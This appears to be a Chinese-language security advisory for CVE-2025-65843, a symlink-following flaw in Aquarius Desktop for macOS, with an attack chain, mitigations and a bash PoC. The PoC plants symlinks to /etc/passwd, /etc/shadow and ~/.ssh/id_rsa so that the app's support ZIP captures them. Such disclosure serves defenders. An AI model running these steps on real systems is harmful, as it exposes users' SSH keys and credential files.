CVE-2025-65843: Aquarius Desktop符号链接跟随导致任意文件访问

漏洞信息

漏洞编号

CVE-2025-65843

漏洞类型

符号链接跟随/不安全文件处理

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Aquarius Desktop 3.0.069 for macOS

漏洞概述

CVE-2025-65843是发现于Aquarius Desktop 3.0.069 macOS版本中的高危安全漏洞，CVSS评分7.7。该漏洞存在于应用程序的支持数据归档生成功能中，由于不安全的符号链接处理机制，攻击者可以通过在~/Library/Logs/Aquarius目录中植入符号链接来访问系统任意位置的文件。应用程序使用JUCE目录迭代器递归枚举日志文件，并配置为自动跟随符号链接，但在写入文件数据前未验证目标是否为符号链接。这种设计缺陷使得本地攻击者能够绕过文件系统权限限制，读取或修改敏感文件，包括用户SSH密钥、配置文件等。当该漏洞与相关的HelperTool提权漏洞结合利用时，甚至可以访问root用户拥有的文件，造成更严重的安全后果。

技术细节

该漏洞的根本原因在于Aquarius Desktop应用程序对符号链接处理的不安全性。具体来说：1) 应用程序在生成支持数据归档时，会遍历~/Library/Logs/Aquarius目录下的所有文件；2) 使用JUCE框架的目录迭代器，且配置为跟随符号链接（follow symlinks）；3) 在递归枚举过程中，将符号链接当作普通文件处理；4) 读取符号链接指向的目标文件内容并将其写入ZIP归档包；5) 整个过程缺少对符号链接目标路径的验证和限制。攻击者只需在目标目录中创建指向敏感文件的符号链接，即可诱导应用程序读取并打包这些文件。这种攻击方式利用了应用程序对文件系统遍历操作的过度信任，属于典型的符号链接跟随漏洞。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者获取目标系统的本地访问权限，确认Aquarius Desktop应用已安装且版本为3.0.069

STEP 2

步骤2: 创建符号链接

攻击者在~/Library/Logs/Aquarius目录中创建指向敏感文件的符号链接，如/etc/passwd、~/.ssh/id_rsa等

STEP 3

步骤3: 触发支持归档生成

攻击者等待用户或以某种方式触发应用程序生成支持数据归档包（Support ZIP）

STEP 4

步骤4: 符号链接跟随

应用程序使用JUCE目录迭代器遍历日志目录，迭代器配置为跟随符号链接，将目标文件内容读取到内存

STEP 5

步骤5: 文件打包外泄

应用程序将符号链接指向的文件内容打包进ZIP归档包，攻击者通过获取支持归档获取敏感文件内容

STEP 6

步骤6: 权限提升（可选）

如果与HelperTool提权漏洞结合，可利用读取的root文件进行进一步攻击，实现root权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-65843 PoC - Symlink Following in Aquarius Desktop
# This PoC demonstrates how to exfiltrate arbitrary files via symlink manipulation

TARGET_DIR="$HOME/Library/Logs/Aquarius"
PAYLOAD_DIR="/tmp/cve65843_exploit"
mkdir -p "$PAYLOAD_DIR"
mkdir -p "$TARGET_DIR"

# Create symlinks to sensitive files
echo "Creating symlinks to target files..."
ln -sf /etc/passwd "$TARGET_DIR/passwd_symlink"
ln -sf "$HOME/.ssh/id_rsa" "$TARGET_DIR/ssh_key_symlink"
ln -sf /etc/shadow "$TARGET_DIR/shadow_symlink"

# Alternative: Create symlink to a writable directory to demonstrate file creation
mkdir -p "$PAYLOAD_DIR/target_directory"
ln -sf "$PAYLOAD_DIR/target_directory" "$TARGET_DIR/dir_symlink"

# Trigger support archive generation
echo "Symlinks created in $TARGET_DIR"
echo "When user generates support archive, these symlinks will be followed"
echo "Files will be included in the generated support ZIP package"
echo ""
echo "Attack scenario:"
echo "1. Attacker gains local access to target machine"
echo "2. Creates symlinks in ~/Library/Logs/Aquarius/"
echo "3. Waits for user/trigger to generate support archive"
echo "4. Attacker obtains the ZIP containing sensitive file contents"

影响范围

Aquarius Desktop 3.0.069 for macOS

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时缓解措施：1) 限制~/Library/Logs/Aquarius目录的写权限，仅允许应用程序本身写入；2) 监控该目录下的文件创建活动，检测异常的符号链接；3) 考虑使用文件系统访问控制策略（如macOS的System Integrity Protection）限制对该目录的访问；4) 在生成支持归档后，立即检查归档内容，确认是否包含非预期的文件；5) 对于高安全需求环境，暂时禁用支持数据归档功能或手动审查归档生成过程。